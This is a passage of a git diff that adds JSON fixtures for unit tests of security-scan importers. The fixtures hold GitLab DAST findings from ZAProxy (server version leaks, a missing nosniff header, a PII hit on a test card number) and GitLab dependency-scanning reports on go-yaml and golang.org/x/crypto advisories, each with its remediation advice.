"nginx/1.17.6" + }, + "id": "4ff21131-f7e3-491e-8e9b-7fcdd0352d4c", + "identifiers": [ + { + "name": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "type": "ZAProxy_PluginId", + "url": "https://github.com/zaproxy/zaproxy/blob/w2019-01-14/docs/scanners.md", + "value": "10036" + }, + { + "name": "CWE-200", + "type": "CWE", + "url": "https://cwe.mitre.org/data/definitions/200.html", + "value": "200" + } + ], + "links": [ + { + "url": "http://httpd.apache.org/docs/current/mod/core.html#servertokens" + }, + { + "url": "http://msdn.microsoft.com/en-us/library/ff648552.aspx#ht_urlscan_007" + }, + { + "url": "http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx" + }, + { + "url": "http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html" + } + ], + "location": { + "hostname": "http://api-server", + "method": "GET", + "param": "", + "path": "/" + }, + "message": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "scanner": { + "id": "zaproxy", + "name": "ZAProxy" + }, + "severity": "Low", + "solution": "Ensure that your web server, application server, load balancer, etc. is configured to suppress the \"Server\" header or provide generic details." + }, + { + "category": "dast", + "confidence": "High", + "cve": "10036", + "description": "The web/application server is leaking version information via the \"Server\" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.", + "discovered_at": "2021-04-23T15:46:40.605", + "evidence": { + "request": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "method": "GET", + "url": "http://api-server/v1" + }, + "response": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "reason_phrase": "Moved Temporarily", + "status_code": 302 + }, + "summary": "nginx/1.17.6" + }, + "id": "eb35495a-9b43-43bf-82ef-e014af424d2d", + "identifiers": [ + { + "name": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "type": "ZAProxy_PluginId", + "url": "https://github.com/zaproxy/zaproxy/blob/w2019-01-14/docs/scanners.md", + "value": "10036" + }, + { + "name": "CWE-200", + "type": "CWE", + "url": "https://cwe.mitre.org/data/definitions/200.html", + "value": "200" + } + ], + "links": [ + { + "url": "http://httpd.apache.org/docs/current/mod/core.html#servertokens" + }, + { + "url": "http://msdn.microsoft.com/en-us/library/ff648552.aspx#ht_urlscan_007" + }, + { + "url": "http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx" + }, + { + "url": "http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html" + } + ], + "location": { + "hostname": "http://api-server", + "method": "GET", + "param": "", + "path": "/v1" + }, + "message": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "scanner": { + "id": "zaproxy", + "name": "ZAProxy" + }, + "severity": "Low", + "solution": "Ensure that your web server, application server, load balancer, etc. is configured to suppress the \"Server\" header or provide generic details." + }, + { + "category": "dast", + "confidence": "High", + "cve": "10036", + "description": "The web/application server is leaking version information via the \"Server\" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.", + "discovered_at": "2021-04-23T15:46:40.638", + "evidence": { + "request": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "method": "GET", + "url": "http://api-server/v1/tree/10" + }, + "response": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "reason_phrase": "Not Found", + "status_code": 404 + }, + "summary": "nginx/1.17.6" + }, + "id": "9ffabe21-a3b2-46ef-93c9-9d2aaffed8e4", + "identifiers": [ + { + "name": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "type": "ZAProxy_PluginId", + "url": "https://github.com/zaproxy/zaproxy/blob/w2019-01-14/docs/scanners.md", + "value": "10036" + }, + { + "name": "CWE-200", + "type": "CWE", + "url": "https://cwe.mitre.org/data/definitions/200.html", + "value": "200" + } + ], + "links": [ + { + "url": "http://httpd.apache.org/docs/current/mod/core.html#servertokens" + }, + { + "url": "http://msdn.microsoft.com/en-us/library/ff648552.aspx#ht_urlscan_007" + }, + { + "url": "http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx" + }, + { + "url": "http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html" + } + ], + "location": { + "hostname": "http://api-server", + "method": "GET", + "param": "", + "path": "/v1/tree/10" + }, + "message": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "scanner": { + "id": "zaproxy", + "name": "ZAProxy" + }, + "severity": "Low", + "solution": "Ensure that your web server, application server, load balancer, etc. is configured to suppress the \"Server\" header or provide generic details." + }, + { + "category": "dast", + "confidence": "High", + "cve": "10036", + "description": "The web/application server is leaking version information via the \"Server\" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.", + "discovered_at": "2021-04-23T15:46:40.615", + "evidence": { + "request": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "method": "GET", + "url": "http://api-server/v1/trees" + }, + "response": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "reason_phrase": "OK", + "status_code": 200 + }, + "summary": "nginx/1.17.6" + }, + "id": "a1339166-77c2-45c7-974c-6fe6caa870ec", + "identifiers": [ + { + "name": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "type": "ZAProxy_PluginId", + "url": "https://github.com/zaproxy/zaproxy/blob/w2019-01-14/docs/scanners.md", + "value": "10036" + }, + { + "name": "CWE-200", + "type": "CWE", + "url": "https://cwe.mitre.org/data/definitions/200.html", + "value": "200" + } + ], + "links": [ + { + "url": "http://httpd.apache.org/docs/current/mod/core.html#servertokens" + }, + { + "url": "http://msdn.microsoft.com/en-us/library/ff648552.aspx#ht_urlscan_007" + }, + { + "url": "http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx" + }, + { + "url": "http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html" + } + ], + "location": { + "hostname": "http://api-server", + "method": "GET", + "param": "", + "path": "/v1/trees" + }, + "message": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "scanner": { + "id": "zaproxy", + "name": "ZAProxy" + }, + "severity": "Low", + "solution": "Ensure that your web server, application server, load balancer, etc. is configured to suppress the \"Server\" header or provide generic details." + }, + { + "category": "dast", + "confidence": "High", + "cve": "10036", + "description": "The web/application server is leaking version information via the \"Server\" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.", + "discovered_at": "2021-04-23T15:46:40.632", + "evidence": { + "request": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "23" + }, + { + "name": "Content-Type", + "value": "application/json" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "method": "POST", + "url": "http://api-server/v1/trees" + }, + "response": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "23" + }, + { + "name": "Content-Type", + "value": "application/json" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "reason_phrase": "Created", + "status_code": 201 + }, + "summary": "nginx/1.17.6" + }, + "id": "356f4003-ce8f-46b0-a3c4-2e39bbdfad62", + "identifiers": [ + { + "name": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "type": "ZAProxy_PluginId", + "url": "https://github.com/zaproxy/zaproxy/blob/w2019-01-14/docs/scanners.md", + "value": "10036" + }, + { + "name": "CWE-200", + "type": "CWE", + "url": "https://cwe.mitre.org/data/definitions/200.html", + "value": "200" + } + ], + "links": [ + { + "url": "http://httpd.apache.org/docs/current/mod/core.html#servertokens" + }, + { + "url": "http://msdn.microsoft.com/en-us/library/ff648552.aspx#ht_urlscan_007" + }, + { + "url": "http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx" + }, + { + "url": "http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html" + } + ], + "location": { + "hostname": "http://api-server", + "method": "POST", + "param": "", + "path": "/v1/trees" + }, + "message": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "scanner": { + "id": "zaproxy", + "name": "ZAProxy" + }, + "severity": "Low", + "solution": "Ensure that your web server, application server, load balancer, etc. is configured to suppress the \"Server\" header or provide generic details." + }, + { + "category": "dast", + "confidence": "Medium", + "cve": "10021", + "description": "The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.", + "discovered_at": "2021-04-23T15:46:40.615", + "evidence": { + "request": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "method": "GET", + "url": "http://api-server/v1/trees" + }, + "response": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "reason_phrase": "OK", + "status_code": 200 + }, + "summary": "This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At \"High\" threshold this scan rule will not alert on client or server error responses." + }, + "id": "36ce923d-d163-4c8e-8af2-811d235f8f02", + "identifiers": [ + { + "name": "X-Content-Type-Options Header Missing", + "type": "ZAProxy_PluginId", + "url": "https://github.com/zaproxy/zaproxy/blob/w2019-01-14/docs/scanners.md", + "value": "10021" + }, + { + "name": "CWE-16", + "type": "CWE", + "url": "https://cwe.mitre.org/data/definitions/16.html", + "value": "16" + } + ], + "links": [ + { + "url": "http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx" + }, + { + "url": "https://owasp.org/www-community/Security_Headers" + } + ], + "location": { + "hostname": "http://api-server", + "method": "GET", + "param": "X-Content-Type-Options", + "path": "/v1/trees" + }, + "message": "X-Content-Type-Options Header Missing", + "scanner": { + "id": "zaproxy", + "name": "ZAProxy" + }, + "severity": "Low", + "solution": "Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing." + }, + { + "category": "dast", + "confidence": "Medium", + "cve": "10021", + "description": "The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.", + "discovered_at": "2021-04-23T15:46:40.632", + "evidence": { + "request": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "23" + }, + { + "name": "Content-Type", + "value": "application/json" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "method": "POST", + "url": "http://api-server/v1/trees" + }, + "response": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "23" + }, + { + "name": "Content-Type", + "value": "application/json" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "reason_phrase": "Created", + "status_code": 201 + }, + "summary": "This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At \"High\" threshold this scan rule will not alert on client or server error responses." + }, + "id": "4c980571-fe02-4f11-aaa8-16aface3339a", + "identifiers": [ + { + "name": "X-Content-Type-Options Header Missing", + "type": "ZAProxy_PluginId", + "url": "https://github.com/zaproxy/zaproxy/blob/w2019-01-14/docs/scanners.md", + "value": "10021" + }, + { + "name": "CWE-16", + "type": "CWE", + "url": "https://cwe.mitre.org/data/definitions/16.html", + "value": "16" + } + ], + "links": [ + { + "url": "http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx" + }, + { + "url": "https://owasp.org/www-community/Security_Headers" + } + ], + "location": { + "hostname": "http://api-server", + "method": "POST", + "param": "X-Content-Type-Options", + "path": "/v1/trees" + }, + "message": "X-Content-Type-Options Header Missing", + "scanner": { + "id": "zaproxy", + "name": "ZAProxy" + }, + "severity": "Low", + "solution": "Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing." + } + ] + } \ No newline at end of file diff --git a/unittests/scans/gitlab_dast/gitlab_dast_one_vul.json b/unittests/scans/gitlab_dast/gitlab_dast_one_vul.json new file mode 100644 index 00000000000..7859308d8e5 --- /dev/null +++ b/unittests/scans/gitlab_dast/gitlab_dast_one_vul.json @@ -0,0 +1,112 @@ +{ + "__comment__": "This is a cut of from the test_api_scan.json", + "vulnerabilities": [ + { + "category": "dast", + "confidence": "High", + "cve": "10062", + "description": "The response contains Personally Identifiable Information, such as CC number, SSN and similar sensitive data.", + "discovered_at": "2021-04-23T15:46:40.615", + "evidence": { + "request": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "method": "GET", + "url": "http://api-server/v1/trees" + }, + "response": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "reason_phrase": "OK", + "status_code": 200 + }, + "summary": "378282246310005; Credit Card Type detected: American Express Bank Identification Number: 378282 Brand: AMERICAN EXPRESS Category: SMALL CORPORATE Issuer: AMERICAN EXPRESS COMPANY" + }, + "id": "5ec00bbc-2e53-44cb-83e9-3d35365277e3", + "identifiers": [ + { + "name": "PII Disclosure", + "type": "ZAProxy_PluginId", + "url": "https://github.com/zaproxy/zaproxy/blob/w2019-01-14/docs/scanners.md", + "value": "10062" + }, + { + "name": "CWE-359", + "type": "CWE", + "url": "https://cwe.mitre.org/data/definitions/359.html", + "value": "359" + } + ], + "links": [], + "location": { + "hostname": "http://api-server", + "method": "GET", + "param": "", + "path": "/v1/trees" + }, + "message": "PII Disclosure", + "scanner": { + "id": "zaproxy", + "name": "ZAProxy" + }, + "severity": "High", + "solution": "" + } + ] + } \ No newline at end of file diff --git a/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-1-vuln.json b/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-1-vuln.json new file mode 100644 index 00000000000..ed6f5ad22d9 --- /dev/null +++ b/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-1-vuln.json @@ -0,0 +1,77 @@ +{ + "version": "3.0.0", + "vulnerabilities": [ + { + "id": "2d8b607cb56d9866c73cdcf33a016f64b4fa37d909c1dd300037b1ac026a3ca5", + "category": "dependency_scanning", + "name": "XML Entity Expansion", + "message": "XML Entity Expansion in gopkg.in/yaml.v2", + "description": "go-yaml is vulnerable to a Billion Laughs Attack.", + "cve": "service/go.sum:gopkg.in/yaml.v2:gemnasium:7368f513-0aa9-4e34-a08d-40ea81f48e0e", + "severity": "Unknown", + "solution": "Upgrade to version 2.2.3 or above.", + "scanner": { + "id": "gemnasium", + "name": "Gemnasium" + }, + "location": { + "file": "service/go.sum", + "dependency": { + "package": { + "name": "gopkg.in/yaml.v2" + }, + "version": "v2.2.2" + } + }, + "identifiers": [ + { + "type": "gemnasium", + "name": "Gemnasium-7368f513-0aa9-4e34-a08d-40ea81f48e0e", + "value": "7368f513-0aa9-4e34-a08d-40ea81f48e0e", + "url": "https://gitlab.com/gitlab-org/security-products/gemnasium-db/-/blob/master/go/gopkg.in/yaml.v2/GMS-2019-2.yml" + } + ], + "links": [ + { + "url": "https://github.com/docker/cli/pull/2117" + } + ] + } + ], + "remediations": [], + "dependency_files": [ + { + "path": "service/go.sum", + "package_manager": "go", + "dependencies": [ + { + "package": { + "name": "gopkg.in/yaml.v2" + }, + "version": "v2.2.2" + }, + { + "package": { + "name": "gopkg.in/yaml.v2" + }, + "version": "v2.2.4" + } + ] + } + ], + "scan": { + "scanner": { + "id": "gemnasium", + "name": "Gemnasium", + "url": "https://gitlab.com/gitlab-org/security-products/analyzers/gemnasium", + "vendor": { + "name": "GitLab" + }, + "version": "2.24.1" + }, + "type": "dependency_scanning", + "start_time": "2020-12-23T13:43:48", + "end_time": "2020-12-23T13:43:49", + "status": "success" + } +} diff --git a/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-2-vuln-missing-component.json b/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-2-vuln-missing-component.json new file mode 100644 index 00000000000..6432d256f36 --- /dev/null +++ b/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-2-vuln-missing-component.json @@ -0,0 +1,122 @@ +{ + "version": "3.0.0", + "vulnerabilities": [ + { + "id": "2d8b607cb56d9866c73cdcf33a016f64b4fa37d909c1dd300037b1ac026a3ca5", + "category": "dependency_scanning", + "name": "XML Entity Expansion", + "message": "XML Entity Expansion in gopkg.in/yaml.v2", + "description": "go-yaml is vulnerable to a Billion Laughs Attack.", + "cve": "service/go.sum:gopkg.in/yaml.v2:gemnasium:7368f513-0aa9-4e34-a08d-40ea81f48e0e", + "severity": "Unknown", + "solution": "Upgrade to version 2.2.3 or above.", + "scanner": { + "id": "gemnasium", + "name": "Gemnasium" + }, + "location": { + "file": "service/go.sum", + "dependency": { + "package": { } + } + }, + "identifiers": [ + { + "type": "gemnasium", + "name": "Gemnasium-7368f513-0aa9-4e34-a08d-40ea81f48e0e", + "value": "7368f513-0aa9-4e34-a08d-40ea81f48e0e", + "url": "https://gitlab.com/gitlab-org/security-products/gemnasium-db/-/blob/master/go/gopkg.in/yaml.v2/GMS-2019-2.yml" + } + ], + "links": [ + { + "url": "https://github.com/docker/cli/pull/2117" + } + ] + }, + { + "id": "e4f855103139f6af7b2ac8c83aa6779fc97a168e06a45235fb6f072cf707c1b5", + "category": "dependency_scanning", + "name": "Nil Pointer Dereference", + "message": "Nil Pointer Dereference in golang.org/x/crypto", + "description": "A nil pointer dereference in the `golang.org/x/crypto/ssh` component allows remote attackers to cause a denial of service against SSH servers.", + "cve": "service/go.sum:golang.org/x/crypto:gemnasium:ffb814a0-404c-11eb-b378-0242ac130002", + "severity": "High", + "solution": "Upgrade to version v0.0.0-20201216223049-8b5274cf687f or above.", + "scanner": { + "id": "gemnasium", + "name": "Gemnasium" + }, + "location": { + "file": "service/go.sum", + "dependency": { + "package": { + "name": "golang.org/x/crypto" + }, + "version": "v0.0.0-20190308221718-c2843e01d9a2" + } + }, + "identifiers": [ + { + "type": "gemnasium", + "name": "Gemnasium-ffb814a0-404c-11eb-b378-0242ac130002", + "value": "ffb814a0-404c-11eb-b378-0242ac130002", + "url": "https://gitlab.com/gitlab-org/security-products/gemnasium-db/-/blob/master/go/golang.org/x/crypto/CVE-2020-29652.yml" + }, + { + "type": "cve", + "name": "CVE-2020-29652", + "value": "CVE-2020-29652", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652" + } + ], + "links": [ + { + "url": "https://go-review.googlesource.com/c/crypto/+/278852" + }, + { + "url": "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1" + }, + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652" + } + ] + } + ], + "remediations": [], + "dependency_files": [ + { + "path": "service/go.sum", + "package_manager": "go", + "dependencies": [ + { + "package": { + "name": "gopkg.in/yaml.v2" + }, + "version": "v2.2.2" + }, + { + "package": { + "name": "gopkg.in/yaml.v2" + }, + "version": "v2.2.4" + } + ] + } + ], + "scan": { + "scanner": { + "id": "gemnasium", + "name": "Gemnasium", + "url": "https://gitlab.com/gitlab-org/security-products/analyzers/gemnasium", + "vendor": { + "name": "GitLab" + }, + "version": "2.24.1" + }, + "type": "dependency_scanning", + "start_time": "2020-12-23T13:43:48", + "end_time": "2020-12-23T13:43:49", + "status": "success" + } +} diff --git a/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-many-vuln.json b/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-many-vuln.json new file mode 100644 index 00000000000..5238ed7d5ff --- /dev/null +++ b/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-many-vuln.json @@ -0,0 +1,659 @@ +{ + "version": "3.0.0", + "vulnerabilities": [ + { + "id": "8a562c9eec7059db9bda22cc3b58657c4bd1f4213e87fcae8876635c0d5803d8", + "category": "dependency_scanning", + "name": "Nil Pointer Dereference", + "message": "Nil Pointer Dereference in golang.org/x/crypto", + "description": "A nil pointer dereference in the `golang.org/x/crypto/ssh` component allows remote attackers to cause a denial of service against SSH servers.", + "cve": "service/go.sum:golang.org/x/crypto:gemnasium:ffb814a0-404c-11eb-b378-0242ac130002", + "severity": "High", + "solution": "Upgrade to version v0.0.0-20201216223049-8b5274cf687f or above.", + "scanner": { + "id": "gemnasium", + "name": "Gemnasium" + }, + "location": { + "file": "service/go.sum", + "dependency": { + "package": { + "name": "golang.org/x/crypto" + }, + "version": "v0.0.0-20190219172222-a4c6cb3142f2" + } + }, + "identifiers": [ + { + "type": "gemnasium", + "name": "Gemnasium-ffb814a0-404c-11eb-b378-0242ac130002", + "value": "ffb814a0-404c-11eb-b378-0242ac130002", + "url": "https://gitlab.com/gitlab-org/security-products/gemnasium-db/-/blob/master/go/golang.org/x/crypto/CVE-2020-29652.yml" + }, + { + "type": "cve", + "name": "CVE-2020-29652", + "value": "CVE-2020-29652", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652" + } + ], + "links": [ + { + "url": "https://go-review.googlesource.com/c/crypto/+/278852" + }, + { + "url": "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1" + }, + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652" + } + ] + }, + { + "id": "e4f855103139f6af7b2ac8c83aa6779fc97a168e06a45235fb6f072cf707c1b5", + "category": "dependency_scanning", + "name": "Nil Pointer Dereference", + "message": "Nil Pointer Dereference in golang.org/x/crypto", + "description": "A nil pointer dereference in the `golang.org/x/crypto/ssh` component allows remote attackers to cause a denial of service against SSH servers.", + "cve": "service/go.sum:golang.org/x/crypto:gemnasium:ffb814a0-404c-11eb-b378-0242ac130002", + "severity": "High", + "solution": "Upgrade to version v0.0.0-20201216223049-8b5274cf687f or above.", + "scanner": { + "id": "gemnasium", + "name": "Gemnasium" + }, + "location": { + "file": "service/go.sum", + "dependency": { + "package": { + "name": "golang.org/x/crypto" + }, + "version": "v0.0.0-20190308221718-c2843e01d9a2" + } + }, + "identifiers": [ + { + "type": "gemnasium", + "name": "Gemnasium-ffb814a0-404c-11eb-b378-0242ac130002", + "value": "ffb814a0-404c-11eb-b378-0242ac130002", + "url": "https://gitlab.com/gitlab-org/security-products/gemnasium-db/-/blob/master/go/golang.org/x/crypto/CVE-2020-29652.yml" + }, + { + "type": "cve", + "name": "CVE-2020-29652", + "value": "CVE-2020-29652", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652" + } + ], + "links": [ + { + "url": "https://go-review.googlesource.com/c/crypto/+/278852" + }, + { + "url": "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1" + }, + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652" + } + ] + }, + { + "id": "52bd3ac2d5a6e23e85c8e56356e6abefdda9907cba630c6c31e25ef745dd7c5d", + "category": "dependency_scanning", + "name": "Nil Pointer Dereference", + "message": "Nil Pointer Dereference in golang.org/x/crypto", + "description": "A nil pointer dereference in the `golang.org/x/crypto/ssh` component allows remote attackers to cause a denial of service against SSH servers.", + "cve": "service/go.sum:golang.org/x/crypto:gemnasium:ffb814a0-404c-11eb-b378-0242ac130002", + "severity": "High", + "solution": "Upgrade to version v0.0.0-20201216223049-8b5274cf687f or above.", + "scanner": { + "id": "gemnasium", + "name": "Gemnasium" + }, + "location": { + "file": "service/go.sum", + "dependency": { + "package": { + "name": "golang.org/x/crypto" + }, + "version": "v0.0.0-20200302210943-78000ba7a073" + } + }, + "identifiers": [ + { + "type": "gemnasium", + "name": "Gemnasium-ffb814a0-404c-11eb-b378-0242ac130002", + "value": "ffb814a0-404c-11eb-b378-0242ac130002", + "url": "https://gitlab.com/gitlab-org/security-products/gemnasium-db/-/blob/master/go/golang.org/x/crypto/CVE-2020-29652.yml" + }, + { + "type": "cve", + "name": "CVE-2020-29652", + "value": "CVE-2020-29652", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652" + } + ], + "links": [ + { + "url": "https://go-review.googlesource.com/c/crypto/+/278852" + }, + { + "url": "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1" + }, + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652" + } + ] + }, + { + "id": "957c4dc61df3f8927b2ad51a6c25644d9ac75cd902d5c93e6366719118e34180", + "category": "dependency_scanning", + "name": "Loop with Unreachable Exit Condition (Infinite Loop)", + "message": "Loop with 